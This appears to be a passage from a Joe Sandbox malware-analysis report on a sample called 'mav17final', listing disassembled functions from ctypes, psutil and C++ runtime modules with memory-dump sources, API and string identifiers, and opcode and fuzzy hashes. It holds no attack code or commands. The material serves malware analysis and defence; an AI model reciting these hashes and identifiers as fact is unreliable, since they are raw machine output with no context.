                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_CharErrorFreeFromLastLocalParseTupleUnicode_Wide
                                                  • String ID: <no description>$|i:FormatError
                                                  • API String ID: 935104296-1632374824
                                                  • Opcode ID: da62cbb651d4d48137c88a006a0480f238e20f846b976fc73609049c0e997912
                                                  • Instruction ID: b3df5705d14a5a318889adeae8b57863e1e6fa661dcb7574ed495cb676c22f3b
                                                  • Opcode Fuzzy Hash: da62cbb651d4d48137c88a006a0480f238e20f846b976fc73609049c0e997912
                                                  • Instruction Fuzzy Hash: 1F016161A08BC692EA548F29FC0407966B1AF45BF2F145234DB2E833D4EE7CE444D710
                                                  Function 00007FF8B9F6DCC0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 38threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Eval_Thread$Arg_Err_FreeFromLibraryParseRestoreSaveTupleWindows
                                                  • String ID: O&:FreeLibrary
                                                  • API String ID: 204461231-2600264430
                                                  • Opcode ID: 078f241c74f91baaec2f50080a5493ab98081374dae74a9cab3a0cffd8d54dea
                                                  • Instruction ID: 272e0ae04eae9bbd424e48490dc1935e3a09f6abe06ef7582776209ce5f895ba
                                                  • Opcode Fuzzy Hash: 078f241c74f91baaec2f50080a5493ab98081374dae74a9cab3a0cffd8d54dea
                                                  • Instruction Fuzzy Hash: 23011721A08F8782EA909F69FC505392760FF86BE6F186435DB4E83754DE2CE445D310
                                                  Function 00007FF8B9F6A9E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: String$Size$AttrBuildBytes_Err_FromObject_Value_
                                                  • String ID: O(O(NN))$__dict__$ctypes objects containing pointers cannot be pickled
                                                  • API String ID: 1770468409-724424928
                                                  • Opcode ID: 3ee03d1d2b345c529b1bd3c85f0488fda98b0b8f69e1e8ea5ec09f1cc578dd04
                                                  • Instruction ID: 87207780ce112e21163c1db16850786aa8c4943f1c0219b28602123f5a8c997b
                                                  • Opcode Fuzzy Hash: 3ee03d1d2b345c529b1bd3c85f0488fda98b0b8f69e1e8ea5ec09f1cc578dd04
                                                  • Instruction Fuzzy Hash: 6C011725A08F8292EA508F1AE94007967A0FF89BF6F485136DF4D17B64DF3CE555C700
                                                  Function 00007FF8B9078240 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf$ErrorLast
                                                  • String ID: psutil module couldn't set SE DEBUG mode for this process; please file an issue against psutil bug tracker$psutil-debug [%s:%d]> $psutil/arch/windows/security.c
                                                  • API String ID: 3541953607-2434820663
                                                  • Opcode ID: 58c77929247e69b2700a71a13f46cd48252ae07743b59a928d119bf549124666
                                                  • Instruction ID: 1c761616f10ccb3ab6d656a7c9439cc6f4210b2342b35a5b6ee930e82d06ffc1
                                                  • Opcode Fuzzy Hash: 58c77929247e69b2700a71a13f46cd48252ae07743b59a928d119bf549124666
                                                  • Instruction Fuzzy Hash: BD014F20F09AC681FE059F2DE8992B52B61AF60BE5F404037CB0E462A1DE6CE587C311
                                                  Function 00007FF8BA242818 Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: abort$AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1501936508-0
                                                  • Opcode ID: cf0ce418dbf8095189d4875bbd922365259c44d693191a2e82a2bfde5589004d
                                                  • Instruction ID: 5eb730a58a0f455b046cd3b06578bb4a433d0dc306ea917f36e8c233b1cfe7be
                                                  • Opcode Fuzzy Hash: cf0ce418dbf8095189d4875bbd922365259c44d693191a2e82a2bfde5589004d
                                                  • Instruction Fuzzy Hash: 17518E32E0AA4381FA65DB1A965463C6394FF54FC4F1A84B6DF4E06795DF2CE842E320
                                                  Function 00007FF8BA2429FC Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: abort$AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1501936508-0
                                                  • Opcode ID: 33b9a28e85c1583a9e53f416898540066328f1663c9e5eff4cdc8514e51169f9
                                                  • Instruction ID: 72ddbded6492c9c4ddf1e819fea62d245303afc2435e7f9d09cb327740514549
                                                  • Opcode Fuzzy Hash: 33b9a28e85c1583a9e53f416898540066328f1663c9e5eff4cdc8514e51169f9
                                                  • Instruction Fuzzy Hash: CE518F21E0AB5381FA69DF1A954463867A6EF44FC0F0984BADF4D0A785DF2CE442E710
                                                  Function 00007FF8B9F6F990 Relevance: 12.1, APIs: 8, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Mem_$FreeMalloc$Err_Memorymemcpy
                                                  • String ID:
                                                  • API String ID: 920471837-0
                                                  • Opcode ID: c91e9501240dbb047462beff57c3e24aa08f07d97696b8881faa54e688d9ffaf
                                                  • Instruction ID: 52a04d0a4e1eaf2f8bfb8f869ad7c17d811aad3a6eebf395967b84376a047219
                                                  • Opcode Fuzzy Hash: c91e9501240dbb047462beff57c3e24aa08f07d97696b8881faa54e688d9ffaf
                                                  • Instruction Fuzzy Hash: 4E512D22A09FC592EB898F39D5503B82360FB59BA5F18A235CF5D17396DF38A0E5C310
                                                  Function 00007FF8B9F62894 Relevance: 12.1, APIs: 8, Instructions: 105COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Tuple_
                                                  • String ID:
                                                  • API String ID: 828192933-0
                                                  • Opcode ID: 5e62f5604a1117c70738b5e9d10e81d038eb8c1c9d08bc44558772b595a0c4de
                                                  • Instruction ID: e140c8c18574392cecc0d58c3ccd9bb0a951395c1f62ba04e911bdca46ebab4c
                                                  • Opcode Fuzzy Hash: 5e62f5604a1117c70738b5e9d10e81d038eb8c1c9d08bc44558772b595a0c4de
                                                  • Instruction Fuzzy Hash: 9C418372909BC285EEA58F2DE8046792690FF46BEAF086135DF4D46768DF3DE494C700
                                                  Function 00007FF8B9F61178 Relevance: 12.1, APIs: 8, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dict_$DeallocObject_$AttrCallContainsErr_ErrorItemMakeOccurredUpdateWith
                                                  • String ID:
                                                  • API String ID: 3953964043-0
                                                  • Opcode ID: 514ed9f4908b8c8283f0e0c27daf6479cf123024387674585ac24fe74f6d228d
                                                  • Instruction ID: d92c6f4d14ae222298bbcdd75575a61605287c7f4f624fc96b5f1f46b8b4cebe
                                                  • Opcode Fuzzy Hash: 514ed9f4908b8c8283f0e0c27daf6479cf123024387674585ac24fe74f6d228d
                                                  • Instruction Fuzzy Hash: 4A411531F09BC281EA558F6DE9542B936A0AF46BF6F08A134DB4E467A5EF2CF445C300
                                                  Function 00007FF8B9F64D38 Relevance: 12.1, APIs: 8, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc
                                                  • String ID:
                                                  • API String ID: 3617616757-0
                                                  • Opcode ID: 068abb66bbfb9b3a2a685b208f6aebfac36357060354af221ed5b1c6e4112d13
                                                  • Instruction ID: f39f222f56f319980a3fbb51ac882de6816f6b37d56c5036418f828c9c07815a
                                                  • Opcode Fuzzy Hash: 068abb66bbfb9b3a2a685b208f6aebfac36357060354af221ed5b1c6e4112d13
                                                  • Instruction Fuzzy Hash: B231E972E09B8681FF95AF78C85437823A8EF5AFBAF186134CB0E45295CF2DA545D300
                                                  Function 00007FF8B9074010 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleQueryVirtual$FileMappedName
                                                  • String ID: (KsOI)
                                                  • API String ID: 1759508357-341566991
                                                  • Opcode ID: 10afd08fc0d88ef5c7b41b69109da1ab331d51090cdaa12fa3b0d99e8a822f8a
                                                  • Instruction ID: 1af3faa9140896b3ad2b93434ed599eaf4331ae420d4949250b71afb3f7fb253
                                                  • Opcode Fuzzy Hash: 10afd08fc0d88ef5c7b41b69109da1ab331d51090cdaa12fa3b0d99e8a822f8a
                                                  • Instruction Fuzzy Hash: 50519A21A09AC681EE649F29A8583B97BA5BF64BE1F484131DF1E43794EF3CE417C700
                                                  Function 00007FF8BA2457C0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: FileHeader_local_unwind
                                                  • String ID: MOC$RCC$csm$csm
                                                  • API String ID: 2627209546-1441736206
                                                  • Opcode ID: 48d146a85fba6cc68383d4a357e19a92ddcb549a58e0a70336f33e234ca841ed
                                                  • Instruction ID: a6c3ec370df7c86fd29db42ee54ec4c4dd997a1d82bd784b4f241ea599061e7d
                                                  • Opcode Fuzzy Hash: 48d146a85fba6cc68383d4a357e19a92ddcb549a58e0a70336f33e234ca841ed
                                                  • Instruction Fuzzy Hash: 09517B72A08A1386EB609F29914137D26A0FF84FE4F1410B6EF8D57795CF3CE885E641
                                                  Function 00007FF8BA24E520 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID: {for
                                                  • API String ID: 2943138195-864106941
                                                  • Opcode ID: 416ecf82abdc7693f83b664dab0e642ebc660969777f9551cf3e7d4c265d34da
                                                  • Instruction ID: aee99267168ab37c7a47761def1a063050a34bb7dfe0ea8b3f99dfa45b765643
                                                  • Opcode Fuzzy Hash: 416ecf82abdc7693f83b664dab0e642ebc660969777f9551cf3e7d4c265d34da
                                                  • Instruction Fuzzy Hash: 90513972A08A86A9F7119F28D5413E877A1FB44B88F8480B1EF5C4BB99DF7CE654D340
                                                  Function 00007FF8B9F62050 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Object_$Dealloc$AttrInstanceLookup
                                                  • String ID: wrong type
                                                  • API String ID: 1828014136-2191655096
                                                  • Opcode ID: 48019a5db2fa545bbb614ff61a29e7f0ff849fa01fd9e197cdd365b54569e53e
                                                  • Instruction ID: b574488f9e3fb358f3ae75cbd40ee923ac78dad541b87856dea6562da0d08583
                                                  • Opcode Fuzzy Hash: 48019a5db2fa545bbb614ff61a29e7f0ff849fa01fd9e197cdd365b54569e53e
                                                  • Instruction Fuzzy Hash: B5514821A09B8391FE509F2DE95017967A0AF85BE2F186431DB4E877A5EF3CF450C350
                                                  Function 00007FF8B9F6BE84 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc
                                                  • String ID: wrong type
                                                  • API String ID: 3617616757-2191655096
                                                  • Opcode ID: bdb23b902ebc4893c2a5809fa917940e2479e1e06ed5718a6fa12672c04d635d
                                                  • Instruction ID: 2cadc50c7c40c5c27fa57efbcffa86c98346a377ace34ed34412fea78985c1a9
                                                  • Opcode Fuzzy Hash: bdb23b902ebc4893c2a5809fa917940e2479e1e06ed5718a6fa12672c04d635d
                                                  • Instruction Fuzzy Hash: 6F516A21A1DBC391FE549F6DE85017867A0AF84BE2F486131DB0E877A5EF2CE841C300
                                                  Function 00007FF8B90C9CC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Bytes_FromSizeStringmemmove
                                                  • String ID: Unable to allocate output buffer.
                                                  • API String ID: 3327154725-2565006440
                                                  • Opcode ID: 9c30319a8999428dde325e815d48d283bad5c3e6560c2351fca3ed9412fd7cc3
                                                  • Instruction ID: 2cd0427d66a57557cdf6d4c4033b6437879e2666a363dbac371fe4572cb5048f
                                                  • Opcode Fuzzy Hash: 9c30319a8999428dde325e815d48d283bad5c3e6560c2351fca3ed9412fd7cc3
                                                  • Instruction Fuzzy Hash: 5D4147B2A08A8291EF168F1AD54426973B1FB48FE4F584432DF1E57756CF38E49AC300
                                                  Function 00007FF8BA24DB00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: NameName::atol
                                                  • String ID: `template-parameter$void
                                                  • API String ID: 2130343216-4057429177
                                                  • Opcode ID: 7b7e14213947c3780e213c190a7c5fdcdd2a49ff05635447eaaef3bd9456bf2e
                                                  • Instruction ID: 68c90b06deacce168a972a8b198dfcc8235cd9a5c791779ef5df6e317537033f
                                                  • Opcode Fuzzy Hash: 7b7e14213947c3780e213c190a7c5fdcdd2a49ff05635447eaaef3bd9456bf2e
                                                  • Instruction Fuzzy Hash: 52413622F18B5698FB008BA8D8512BC23B1BF48BC8F9841B6DF0D27A59DF7CA545D340
                                                  Function 00007FF8BA248900 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+Replicator::operator[]
                                                  • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                  • API String ID: 1405650943-2211150622
                                                  • Opcode ID: 463b429a368d480f938697e6d099cec3f907049628b5d1349ecbd199c78a6655
                                                  • Instruction ID: f4977681498b99bad9e124ff31f977ce293d849754e50b0eadbf9aaec4613c2a
                                                  • Opcode Fuzzy Hash: 463b429a368d480f938697e6d099cec3f907049628b5d1349ecbd199c78a6655
                                                  • Instruction Fuzzy Hash: 2A4149B2E28B8698F7158B6CD9402BC37A0BB08B88F5885B5CF4C16794DF7DA545E701
                                                  Function 00007FF8BA24A6E4 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 80COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID: char $int $long $short $unsigned
                                                  • API String ID: 2943138195-3894466517
                                                  • Opcode ID: 01c330b6d3460536b725c75710ede4031362a47bdaf6c5878ce89829e4b6ba2f
                                                  • Instruction ID: b9e73a66295a0a1c68104a5b9e6b6d7823437072ea424affaedb013e7fced90d
                                                  • Opcode Fuzzy Hash: 01c330b6d3460536b725c75710ede4031362a47bdaf6c5878ce89829e4b6ba2f
                                                  • Instruction Fuzzy Hash: 92315876E18A5688F7228B2DC8543BC27B0BB09B88F5481B1DF0C06AA9DF3DE544E750
                                                  Function 00007FF8B9841090 Relevance: 10.6, APIs: 7, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073245464.00007FF8B9841000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B9840000, based on PE: true
                                                  • Associated: 00000002.00000002.2073221006.00007FF8B9840000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073310530.00007FF8B9845000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073339457.00007FF8B9846000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9840000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocModule_State
